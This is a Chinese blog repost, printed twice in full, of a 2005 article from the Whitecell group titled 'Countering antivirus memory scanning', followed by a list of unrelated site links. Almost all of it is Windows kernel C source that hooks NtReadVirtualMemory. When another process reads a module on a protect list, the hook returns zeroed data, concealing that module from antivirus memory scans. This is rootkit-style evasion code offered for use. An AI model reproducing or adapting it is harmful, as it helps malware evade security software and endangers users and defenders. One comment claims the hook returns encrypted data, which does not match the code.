对抗杀毒软件的内存扫描
来源:互联网 发布:德国dm淘宝旗舰店 编辑:程序博客网 时间:2024/04/28 05:49
Author:Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:2005-11-17
/*++
Author: Polymorphours
Date: 2005/1/10
通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
如果发现其他进程读被保护模块的内存,则返回0
--*/
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
/*
+0x034 Flags: Uint4B
+0x038 LoadCount: Uint2B
+0x03a TlsIndex : Uint2B
+0x03c HashLinks: _LIST_ENTRY
+0x03c SectionPointer : Ptr32 Void
+0x040 CheckSum : Uint4B
+0x044 TimeDateStamp: Uint4B
+0x044 LoadedImports: Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 Void
+0x04c PatchInformation : Ptr32 Void
*/
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
/*++
函数名: MyNtReadVirtualMemory
参数:
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN ULONG BufferLength,
OUT PULONG ReturnLength OPTIONAL
功能:
隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程
返回:
NTSTATUS
--*/
NTSTATUS
MyNtReadVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN ULONG BufferLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS status;
PEPROCESS eProcess;
PVOIDPeb;
PPEB_LDR_DATA PebLdrData;
PLDR_DATA_TABLE_ENTRY LdrDataTableHeadList;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry;
PLIST_ENTRY Blink;
PPROTECT_NODEFileNode = NULL;
BOOLEANbHideFlag = FALSE;
ULONGImageMaxAddress = 0;
/*
#ifdef _DEBUG
DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/
status =ObReferenceObjectByHandle(
ProcessHandle,
FILE_READ_DATA,
PsProcessType,
KernelMode,
(PVOID)&eProcess,
NULL
);
if ( NT_SUCCESS(status) ) {
//
// 得到PEB的地址
//
Peb = (PVOID)(*(PULONG)((PCHAR)eProcess + PebOffset));
//
// 切换到目标进程空间
//
KeAttachProcess( eProcess );
//
// 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
//
if ( !MmIsAddressValid( Peb ) ) {
/*
#ifdef _DEBUG
DbgPrint( "PEB is error./n" );
#endif
*/
KeDetachProcess();
ObDereferenceObject( eProcess );
goto CLEANUP;
}
PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));
if ( !PebLdrData ) {
KeDetachProcess();
ObDereferenceObject( eProcess );
goto CLEANUP;
}
try {
ProbeForRead (
PebLdrData,
sizeof(PEB_LDR_DATA),
sizeof(ULONG)
);
//
// 遍历模块链表
//
LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
LdrDataTableEntry = LdrDataTableHeadList;
do {
ProbeForRead(
LdrDataTableEntry,
sizeof(LDR_DATA_TABLE_ENTRY),
sizeof(ULONG)
);
if ( !LdrDataTableEntry->DllBase ) {
LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
continue;
}
//
// 判断读的内存属于那一个模块,如果都不属于,那么放过
//
ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);
if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
(ULONG)BaseAddress > ImageMaxAddress ) {
//
// 如果不是读模块区域,那么枚举下一个
//
LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
continue;
}
//
// 如果是被保护的模块,那么返回虚假数据
//
bHideFlag = FALSE;
Blink = ProtectFile.Blink;
while ( Blink != &ProtectFile ) {
FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );
//
// 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
//
if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {
bHideFlag = TRUE;
break;
}
Blink = Blink->Blink;
}
if ( bHideFlag ) {
//
// 返回原本的进程空间进行处理
//
KeDetachProcess();
ObDereferenceObject( eProcess );
ProbeForWrite(
Buffer,
BufferLength,
sizeof(ULONG)
);
memset( Buffer, 0x00, BufferLength );
ProbeForWrite(
ReturnLength,
sizeof(PULONG),
sizeof(ULONG)
);
*ReturnLength = BufferLength;
return STATUS_SUCCESS;
}
LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
} while ( LdrDataTableEntry != LdrDataTableHeadList );
} except( EXCEPTION_EXECUTE_HANDLER ) {
if ( !bHideFlag ) {
KeDetachProcess();
ObDereferenceObject( eProcess );
}
goto CLEANUP;
}
KeDetachProcess();
ObDereferenceObject( eProcess );
}
CLEANUP:
return NtReadVirtualMemory(
ProcessHandle,
BaseAddress,
Buffer,
BufferLength,
ReturnLength
);
}
WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:2005-11-17
/*++
Author: Polymorphours
Date: 2005/1/10
通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
如果发现其他进程读被保护模块的内存,则返回0
--*/
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
/*
+0x034 Flags: Uint4B
+0x038 LoadCount: Uint2B
+0x03a TlsIndex : Uint2B
+0x03c HashLinks: _LIST_ENTRY
+0x03c SectionPointer : Ptr32 Void
+0x040 CheckSum : Uint4B
+0x044 TimeDateStamp: Uint4B
+0x044 LoadedImports: Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 Void
+0x04c PatchInformation : Ptr32 Void
*/
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
/*++
函数名: MyNtReadVirtualMemory
参数:
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN ULONG BufferLength,
OUT PULONG ReturnLength OPTIONAL
功能:
隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程
返回:
NTSTATUS
--*/
NTSTATUS
MyNtReadVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN ULONG BufferLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS status;
PEPROCESS eProcess;
PVOIDPeb;
PPEB_LDR_DATA PebLdrData;
PLDR_DATA_TABLE_ENTRY LdrDataTableHeadList;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry;
PLIST_ENTRY Blink;
PPROTECT_NODEFileNode = NULL;
BOOLEANbHideFlag = FALSE;
ULONGImageMaxAddress = 0;
/*
#ifdef _DEBUG
DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/
status =ObReferenceObjectByHandle(
ProcessHandle,
FILE_READ_DATA,
PsProcessType,
KernelMode,
(PVOID)&eProcess,
NULL
);
if ( NT_SUCCESS(status) ) {
//
// 得到PEB的地址
//
Peb = (PVOID)(*(PULONG)((PCHAR)eProcess + PebOffset));
//
// 切换到目标进程空间
//
KeAttachProcess( eProcess );
//
// 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
//
if ( !MmIsAddressValid( Peb ) ) {
/*
#ifdef _DEBUG
DbgPrint( "PEB is error./n" );
#endif
*/
KeDetachProcess();
ObDereferenceObject( eProcess );
goto CLEANUP;
}
PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));
if ( !PebLdrData ) {
KeDetachProcess();
ObDereferenceObject( eProcess );
goto CLEANUP;
}
try {
ProbeForRead (
PebLdrData,
sizeof(PEB_LDR_DATA),
sizeof(ULONG)
);
//
// 遍历模块链表
//
LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
LdrDataTableEntry = LdrDataTableHeadList;
do {
ProbeForRead(
LdrDataTableEntry,
sizeof(LDR_DATA_TABLE_ENTRY),
sizeof(ULONG)
);
if ( !LdrDataTableEntry->DllBase ) {
LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
continue;
}
//
// 判断读的内存属于那一个模块,如果都不属于,那么放过
//
ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);
if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
(ULONG)BaseAddress > ImageMaxAddress ) {
//
// 如果不是读模块区域,那么枚举下一个
//
LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
continue;
}
//
// 如果是被保护的模块,那么返回虚假数据
//
bHideFlag = FALSE;
Blink = ProtectFile.Blink;
while ( Blink != &ProtectFile ) {
FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );
//
// 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
//
if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {
bHideFlag = TRUE;
break;
}
Blink = Blink->Blink;
}
if ( bHideFlag ) {
//
// 返回原本的进程空间进行处理
//
KeDetachProcess();
ObDereferenceObject( eProcess );
ProbeForWrite(
Buffer,
BufferLength,
sizeof(ULONG)
);
memset( Buffer, 0x00, BufferLength );
ProbeForWrite(
ReturnLength,
sizeof(PULONG),
sizeof(ULONG)
);
*ReturnLength = BufferLength;
return STATUS_SUCCESS;
}
LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
} while ( LdrDataTableEntry != LdrDataTableHeadList );
} except( EXCEPTION_EXECUTE_HANDLER ) {
if ( !bHideFlag ) {
KeDetachProcess();
ObDereferenceObject( eProcess );
}
goto CLEANUP;
}
KeDetachProcess();
ObDereferenceObject( eProcess );
}
CLEANUP:
return NtReadVirtualMemory(
ProcessHandle,
BaseAddress,
Buffer,
BufferLength,
ReturnLength
);
}
WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/
- 对抗杀毒软件的内存扫描
- 对抗杀毒软件的内存扫描
- 对抗杀毒软件的内存扫描
- 对抗杀毒软件的内存扫描
- 恶意代码--杀毒软件查杀的对抗技巧分享
- 测试一下你的杀毒软件病毒扫描引擎的性能
- 对抗内存搜索对象
- 内存资源较少的杀毒软件:NOD32 2.70.16英文版
- 一分钟内搞定!熊猫杀毒软件研发提升扫描速度的技术
- Linux 下使用杀毒软件clamav扫描木马病毒
- Linux 下使用杀毒软件clamav扫描木马病毒
- 客户端内存修改对抗神器
- Windows2000下用户模式的内存扫描
- 国产杀毒软件的困惑
- 杀毒软件的简单实现
- 杀毒软件的奥秘
- linux下的杀毒软件
- 微软的免费杀毒软件!
- Java正则表达式详解
- 4.18SQL练习
- 如何使用Java自带的正则表达式
- 得到域名的一种方法
- Server.MapPath(path)的详细说明
- 对抗杀毒软件的内存扫描
- Microsoft .Net Remoting系列专题之二
- webwork 的过滤器的用法
- 吸烟有害健康之胃肠系统(吸烟者必看)
- project里程碑的设置
- genexus 存取图片或文件到数据库的操作
- DataGrid资料整理
- 我的一个博客
- systemparametersinfo参数说明
